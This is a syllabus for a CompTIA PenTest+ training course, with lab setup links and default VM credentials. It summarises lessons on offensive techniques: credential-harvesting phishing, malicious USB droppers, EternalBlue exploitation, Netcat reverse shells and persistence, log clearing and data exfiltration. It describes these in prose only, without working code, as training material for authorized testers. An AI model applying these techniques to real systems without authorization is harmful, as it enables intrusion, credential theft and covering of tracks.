CompTIA PenTest+ Certification
Security Training Architect I in Content
Welcome to the CompTIA PenTest+ certification course!
What is a penetration tester? Maybe you've been exposed to the idea of being an ethical hacker through movies or television, and this profession intrigues you. Or maybe you already work in the security field and you'd like to move into a penetration tester (pentester) role. If either of these are true, you've come to the right place.
Pentesters specialize in identifying and exploiting weaknesses within organizations. Pentesters not only work to discover weaknesses in servers and applications, but also in people. To be a successful pentester, you must know how to use a variety of tools, and you should be able to write scripts in multiple languages, as this allows you to write your own tools and create time-saving scripts.
The CompTIA PenTest+ certification course will walk you through the process of performing a pentest. You'll also become familiar with many popular tools and scripting languages. Whether you're interested in becoming a pentester or simply curious about the profession, this course is for you. Not only will this course prepare you for the certification exam, but it will also arm you with the skills necessary for entering into the mysterious realm of pentesting.
About the Author
In this video, you'll meet Bob Salmans, the security training architect for this course.
About the Course
This video outlines what to expect from this course. We'll discuss how pentetration testing works and several of the tools used during the process.
Setting Up Your Pentest Lab
In this video, we will walk through the process of setting up your pentest lab. We've provided you with four images to download to build your own pentest lab. We will be using Virtualbox, a free hypervisor that runs on Linux, MacOS, and Windows. The lab will require 60 GB of space and 5 GB of memory. The virtual machines can run on an external hard drive; you do not have to use local hard drive space. 1. Download the four virtual machine images here: https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/Kali+Linux/Kali_Linux.ova https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/MS2+Linux/MS2_Linux.ova https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/MS3+Linux/MS3_Linux.ova https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/MS3-Windows/MS3_Windows.ova (To re-initialize the Windows demo license, open an Administrative command prompt and run "slmgr.vbs -rearm") 2. Credentials for the virtual machines: Kali Linux: root / toorMS2 Linux: msfadmin / msfadminMS3 Windows: vagrant / vagrantMS3 Linux: vagrant / vagrant 3. Download latest CherryTree lab file onto your Kali machine: https://github.com/linuxacademy/content-pentest-cherrytree-upload/raw/master/Pentest-Plus-Labs.ctb Note: All of these VM's virtual network adapters have been setup to prevent them from accessing the Internet for your safety. If you would like to enable Internet access on your Kali vm, follow these steps: Turn off your Kali VMWithin Virtualbox right click on your Kali VM and select settings Click on the network icon Select "Adapter 2" Check the box next to "Enable Network Adapter"Next to "Attached to:" select "NAT" from the drop downClick OKPower on your Kali VM and it should now have Internet access
About the Exam
This video provies an overview of the CompTIA PenTest+ certification exam, including the exam format, pricing, and length, and how to sign up for it.
1.0 Planning and Scoping
1.1 Planning for an Engagement
Pentests and Pentesting Frameworks
In this video, we'll start building the foundational knowledge needed to become a pentester. We'll be covering what exactly a pentest is and what pentesting frameworks are.
The Pentest Process
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering the pentest process, as outlined by CompTIA.
Communication, Rules of Engagement, and Resources
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering the importance of communication, rules of engagement, and resources used during a pentest.
Confidentiality, Budgeting, Impact Analysis, Remediation Timelines, Disclaimers, and Constraints
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering the importance of confidentiality, budgeting, impact analysis, remediation timelines, disclaimers, and constraints.
1.2 Legal Considerations
Key Legal Concepts
In this video, we'll go over key legal concepts in pentesting, including the types of contracts involved in a pentest, export laws, corporate policies, cloud providers, and computer crime laws. NOTE: AWS's rules for pentesting have changed since the recording of this video. They now allow for some pentesting activities and their penetration testing policy can be found here: https://aws.amazon.com/security/penetration-testing/
1.3 Scoping an Engagement
Defining the Scope, Goals and Deliverables, and Assessments and Strategies
In this video, we will discuss what a scope is and what it consists of. We will also talk about project goals and deliverables and go over the different assessment types and strategies.
Threat Actors, Risk Response, and Tolerance
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering what a threat actor is, risk response, and the idea of tolerance as it relates to a pentest.
Types of Targets and Pentest Considerations
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering types of targets and what to consider during a pentest.
1.4 Key Aspects of Compliance-Based Assessments
In this video, we'll discuss compliance frameworks, the different types of controls checked during an audit, and why it's important for pentesters to understand compliance.
2.0 Information Gathering and Vulnerability Identification
2.1 Information Gathering Techniques
Active and Passive Reconnaissance
In this video, we cover active and passive reconnaissance of our target. This includes the use of Open Source Intelligence (OSINT) during passive reconnaissance and different types of target scanning during active reconnaissance.
Weaponizing Data and Introduction to Metasploit
In this video, we'll cover the idea of weaponizing data and have an introduction to Metasploit. During the introduction to Metasploit, we'll cover what Metasploit is and how to use it.
In this video, we'll cover enumeration. This includes enumeration of Linux and Windows hosts, services and shares, and websites. We also take a look at some tools that will help in the enumeration process.
Introduction to Meterpreter
In this video. you will be introduced to Meterpreter, available in the Metasploit framework. We will show you the capabilities of some of the tools Meterpreter has and where to learn more about each of the tools.
Scenario Walkthrough 01: How to Use Nmap to Scan a Host
This video will introduce you to the wonderful Nmap tool. Nmap is probably the most widely used tool in the security industry. You will need to be very familiar with Nmap because it's covered in detail on the PenTest+ exam.
Scenario Walkthrough 02: How to Enumerate a Service with Banner Grabbing
In this video, we'll be peforming the process of banner grabbing to enumerate services. We'll be using NMAP, Netcat, and Bash to perform banner grabbing in three different ways. We'll compare the three methods to see the differences in enumerated data.
Scenario Walkthrough 03: Performing Website Enumeration with Kali Linux
In this video, you'll use Kali Linux to perform website enumeration. NMAP will be the tool of choice for this task. We'll enumerate a couple of websites and take a look at what we are able to find that may help us compromise a host.
Scenario Walkthrough 04: Using OWASP Dirbuster to Find Hidden Directories
In this video, we'll take a look at the OWASP Dirbuster tool. This tool is designed to discover directories and files on a website. It can use dictionary word files in an attempt to guess file and directory names and can identify hidden directories.
Scenario Walkthrough 05: Finding OSINT Data Using theHarvester and the OSRFramework
In this video, we'll gather OSINT data using two tools. The first tool is theHarvester and the second is the OSRFramework. OSRFramework doesn't come pre-installed on Kali Linux like theHarvester does, but it's installed in the Kali Linux image you downloaded from Linux Academy.
2.2 Performing a Vulnerability Scan
In this video, we'll discuss the different types of vulnerability scans and what to consider when planning a scan. We'll also take a look at container security and application security.
Scenario Walkthrough 06: Scanning Websites for Vulnerabilities Using Nikto
In this video, we'll be using Nikto, a web vulnerability scanner, to scan a website for vulnerabilities. We'll also look at using NMAP to scan for open web ports and then pass them on to Nikto to scan for vulnerabilities. Lastly, we'll take a look at what vulnerabilities were identified and how they may help us compromise the host.
Scenario Walkthrough 07: Performing a Vulnerability Scan using OpenVAS
In this video, we'll be using the OpenVAS vulnerability scanner to scan a host and identify vulnerabilities present on that host. We'll be using Greenbone Security Assistance, a web front-end for OpenVAS to set up and run the scan.
Scenario Walkthrough 08: Using Nmap to Scan for Vulnerabilities
In this video, we'll be taking a look at an additional feature of NMAP which uses built-in scripts to scan for vulnerabilities. We'll also discuss scenarios in which you'd use NMAP for vulnerability scanning.
2.3 Analyzing Vulnerability Scan Results
In this video, we'll discuss the process of analyzing vulnerabilities. We'll go over how to review the results from vulnerability scans to identify false positives and categorize and prioritize our findings.
Scenario Walkthrough 09: Analyzing an OpenVAS Vulnerability Report
In this video, we'll be reviewing the report from the vulnerability scan you ran with OpenVAS in scenario walkthrough number 7. We'll look at the individual vulnerabilities identified, possible solutions to the vulnerabilities, and a couple of features within OpenVAS reports.
2.4 Leveraging Information to Prepare for Exploitation
In this video, we'll be covering the idea of leveraging the information found during reconnaissance. This includes mapping vulnerabilities and prioritizing them. We also take a look at many common attack techniques and common ways to gain access.
Scenario Walkthrough 10: An Introduction to CherryTree
In this video, you'll be introduced to CherryTree, a note-taking application that comes pre-installed on Kali Linux. CherryTree allows for nested formatting, URL links, and the insertion of images. We'll also take a look at creating a screenshot in Kali Linux using GIMP.
2.5 System Weaknesses
Weaknesses of Specialized Systems
In this video, we cover specialized systems and thier weaknesses. Specialized systems include mobile devices, SCADA, ICS, RTOS, IoT, and POS. We take a look at why these devices have weaknesses and how they may be our way into a network.
3.0 Attacks and Exploits
3.1 Social Engineering
Components of a Social Engineering Attack
In this video, we will discuss the components of a social engineering attack. We will also walk through a scenario in which we attempt to discover our target organization's ISP.
Social Engineering Attacks and Techniques
In this video, we will review the different motivation techniques that can be used in a social engineering attack. We will also discuss the different types of phishing attacks, including vishing and whaling.
Scenario Walkthrough 11: Creating a Credential Harvesting Website with SET
In this scenario walkthrough, we will be using the Social Engineering Toolkit (SET) to create a credential harvesting website. After creating the website, we can send out phishing emails with links to the website in hopes that a target will follow the link and enter their credentials.
Scenario Walkthrough 12: Using SET to Execute a Spear Phishing Attack
In this scenario walkthrough, we will be using the Social Engineering Toolkit (SET) to craft a spear phishing attack. We will select the exploit, payload, and target email address, and then launch the attack. The OSINT data we gathered earlier will be crucial for the success of this attack.
Scenario Walkthrough 13: Executing a USB Dropper Attack Using SET
In this scenario walkthrough, we will be using the Social Engineering Toolkit (SET) to craft a USB dropper attack. We will create a malicious .exe file that, when launched, will create a reverse TCP Meterpreter shell back to our Kali box. This attack relies on our target's lack of security awareness and their curiosity. When leaving USB devices behind at our target's site, we want to make them enticing by labeling them something like “Vacation Pictures” or “Payroll Data”.
3.2 Network-Based Vulnerabilities
Sniffing, Hijacking, and Man-in-the-Middle Attacks
In this video, we'll go over the technical aspects of sniffing, including DNS poisoning. Then we'll dive into a couple different types of hijacking and discuss man-in-the-middle attacks.
Network Protocol Attacks
In this video, we'll cover several network protocols (SMB, SNMP, SMTP, and FTP) and the different ways to attack them.
Name Resolution, Brute Force, and DoS Attacks
In this video, we'll discuss more common network attacks, including name resolution attacks and brute force attacks. We'll also go over pass-the-hash, denial of service (DoS) attacks, and VLAN hopping.
Scenario Walkthrough 14: DNS Poisoning Using the Hosts File
In this scenario walkthrough, we'll use a form of DNS poisoning to redirect our targets to a credential harvesting website we set up using the Social Engineering Toolkit (SET). This isn't necessarily an exact replica of an attack you might carry out, but it demonstrates the effects of DNS poisoning.
Scenario Walkthrough 15: Using Wireshark to Sniff Plaintext Passwords
In this scenario walkthrough, we will take a look at the dangers of communicating in plain text versus using encrypted communications. We'll use Wireshark to sniff an FTP session and identify the credentials used to authentication to the FTP server.
3.3 Wireless and RF-Based Vulnerabilities
Wireless Attacks and Exploits
In this video, we'll discuss several different types of wireless attacks, including evil twin attacks, de-authentication, fragmentation, bluesnarfing, and bluejacking.
Performing an Evil Twin Attack with SSLsplit
In this video, I'll show you how to set up an evil twin attack by running the SSLsplit module on a Wi-Fi pineapple to intercept user credentials. The goal of this attack is to mimic a target's wireless network so the user's devices will connect to our access point instead of the real one. When the target attempts to connect to SSL websites, they'll receive our access point's SSL certificate, allowing us to intercept their credentials.
3.4 Application-Based Vulnerabilities
Directory Traversal and Poison Null Bytes
In this video, we'll discuss some common web application vulnerabilities. We'll also go over a few of the attacks used to exploit these vulnerabilities, including directory traversal and poison null bytes.
Authentication, Authorization, and Injection Attacks
In this video, we'll go over some of the different types of authentication, authorization, and injection attacks, including brute-forcing, cross-site scripting (XSS), and SQL injection.
File Inclusion Vulnerabilities and Web Shells
In this video, we'll go over local and remote file inclusion vulnerabilities and learn what web shells are and how we can use them. We will also discuss race conditions and how insecure code can lead to vulnerable applications.
Scenario Walkthrough 16: Using Hydra to Brute-Force FTP
In this scenario walkthrough, we will use Hydra to perform a brute force attack against an FTP server. Hydra can be used for brute force attacks against many protocols, not just FTP.
Scenario Walkthrough 17: Finding Web Application Vulnerabilities with OWASP ZAP
In this scenario walkthrough, we'll use OWASP ZAP to find vulnerabilities in a web application. OWASP ZAP is a very popular tool, and it's really easy to use. You can perform either automated or manual testing with OWASP ZAP, and it's user-friendly for all skill levels.
3.5 Local Host Vulnerabilities
OS Vulnerabilities and Password Cracking
In this video, we'll take a look at several different types of operating system vulnerabilities in Windows and Linux. We'll also take a look at password cracking techniques for Windows and Linux.
Password Cracking Tools, Default Accounts, and Privilege Escalation
In this video, we'll review the tools that can be used for different types of password attacks. We'll also cover default accounts on both Windows and Linux, as well as how to perform privilege escalation on both operating systems.
System Files, Sandbox Escapes, and Hardware Attacks
In this video, we'll go over the Windows and Linux system files you need to be familiar with for the PenTest+ certification exam. We'll also take a look at sandbox escapes and hardware-level attacks.
Scenario Walkthrough 18: Obtaining Password Hashes with Armitage
In this scenario walkthrough, we will use Armitage to brute-force VNC on our MS2 Linux box. Once we successfully brute-force VNC, we'll create a user account on the box. Then we'll log in to the MS2 Linux box with our new credentials and grab some password hashes that we'll crack using John the Ripper.
Scenario Walkthrough 19: Cracking Password Hashes with John the Ripper
In this scenario walkthrough, we will use SCP to exfiltrate the hashes that we gained access to in the previous section. Once the password hashes have been exfiltrated from our MS2 Linux box, we will use John the Ripper to crack the root password hash.
Scenario Walkthrough 20: Performing Local Privilege Escalation with Meterpreter
In this scenario walkthrough, we will perform local privilege escalation using Meterpreter. Meterpreter has a built-in privilege escalation script that can make this process as simple as running a single command. The getsystem command runs through several different techniques in an attempt to gain system-level privileges.
Scenario Walkthrough 21: Exploiting the EternalBlue Vulnerability
In this scenario walkthrough, we will use the Metasploit framework to exploit MS17-010 (the SMB EternalBlue vulnerability) on our MS3 Windows box. We will use the Metasploit framework to set our exploit, payload, and options, then exploit the vulnerability and hopefully get a Meterpreter shell.
3.6 Physical Security Vulnerabilities
Physical Security Goals and Guidelines
In this video, we'll discuss physical security testing. We'll take a look at the different test types and the overall goal of physical security penetration tests.
3.7 Post-Exploitation Techniques
Lateral Movement, Pivoting, and Persistence
In this video, we'll talk about lateral movement, pivoting, and persistence. We'll go over what all of these terms mean and how to achieve each of them.
Shells, Netcat, and Scheduled Tasks
In this video, we'll cover two different kinds of shells and how to set them up using Netcat. We'll also take a look at how to set up scheduled tasks in Windows and cron jobs in Linux, both of which can be used to establish persistence.
Services/Daemons, Anti-Forensics, and Covering Your Tracks
In this video, we'll take a look at Windows services and Linux daemons and how we can use them during a pentest. We'll also review some anti-forensics techniques and how to cover your tracks.
Scenario Walkthrough 22: Clearing System Logs with Meterpreter
In this scenario walkthrough, we will use Meterpreter to clear the system logs on our MS3 Windows machine. Meterpreter includes a built-in script for clearing system logs. All it takes to run it is a single command: clearev. It's that easy!
Scenario Walkthrough 23: Setting Up Persistence with Netcat
In this scenario walkthrough, we will set up persistence using Netcat. Once we have a Meterpreter session to our target, we'll upload the netcat executable. Then we'll set registry values to launch a Netcat connection to a listener on our Kali box in order to create a reverse shell to our target.
Scenario Walkthrough 24: Exfiltrating Data with Netcat
In this scenario walkthrough, we will exfiltrate data from our compromised target to our Kali box. We will use two separate Netcat sessions to do this. The first session will be our management session. The second will be used to transfer a file from our target to our Kali box.
Scenario Walkthrough 25: Setting Up Persistence with Meterpreter
In this scenario walkthrough, we will set up persistence with a Meterpreter shell. We will use a tool called msfvenom to create a custom .exe payload file which we will then transfer to our target using the built-in Meterpreter script persistence_exe.
Scenario Walkthrough 26: Exfiltrating Data with Meterpreter
In this scenario walkthrough, we will exfiltrate data with Meterpreter. If you have a Meterpreter shell, this is the easiest way to exfiltrate data from your target.
4.0 Penetration Testing Tools
4.1 Using Nmap for Information Gathering
Nmap Deep Dive
In this video, we'll discuss how to use Nmap to gather information. From executing standard port scans to running scripts, Nmap is a powerful pentesting tool, and you'll be tested on it in the PenTest+ certification exam.
4.2 Choosing Pentesting Tools
Pentesting Tools and Use Cases
In this video, we will review a variety of pentesting tools, many of which we've already discussed and used in labs. We'll talk about some of the most common pentesting use cases and go over which tools are best suited to each.
4.3 Analyzing Tool Output and Data
Understanding Tool Outputs
In this video, we'll discuss several different types of attacks and the tools used to perform them. We will walk through how these tools are used and learn how to read each tool's output.
Scenario Walkthrough 27: Executing a Pass-the-Hash Attack
In this scenario walkthrough, we'll perform a pass-the-hash attack using a password hash in place of a cracked password. We'll start by getting a Meterpreter shell, then running Meterpreter's hashdump script to get account hashes on the target. Then we'll use Metasploit and the psexec module to perform the pass-the-hash attack and get a new Meterpreter shell on our target.
Scenario Walkthrough 28: Performing a SQL Injection Attack
In this scenario walkthrough, we will take a look at SQL injection and how we can manipulate a vulnerable website into showing us data that we shouldn't have access to.
4.4 Analyzing Basic Scripts
Analyzing Scripts in Bash, PowerShell, Python, and Ruby
In this video, we will analyze ping sweep scripts written in Bash, Powershell, Python, and Ruby. We'll also discuss some scripting basics, such as defining variables and using looping.
5.0 Reporting and Communications
5.1 Report Writing and Handling
Report Writing and Handling Best Practices
In this video, we'll discuss data normalization and the proper format of a pentest report. We will also go over report handling and learn about risk appetite.
5.2 Post-Report Delivery Activities
Delivery and Post-Delivery
In this video, we'll discuss pentest report delivery and go over what should happen during a report delivery meeting. We will also cover what happens post-delivery, such as any necessary follow-up tasks.
5.3 Mitigating Discovered Vulnerabilities
Vulnerability Mitigation Strategies
In this video, we'll discuss mitigation strategies, including solutions for people, process, and technology. We will also talk about the secure software development lifecycle.
5.4 Communicating During the Penetration Testing Process
The Importance of Communications
In this video, we'll review the importance of effective communication during a penetration test. We'll discuss communications paths, communication triggers, and goal reprioritization.
Taking the PenTest+ Certification Exam
Congratulations, you've made it to the end of the course! Now it's time to get certified. This video goes over important information about the CompTIA PenTest+ certification exam and walks you through how to schedule the exam.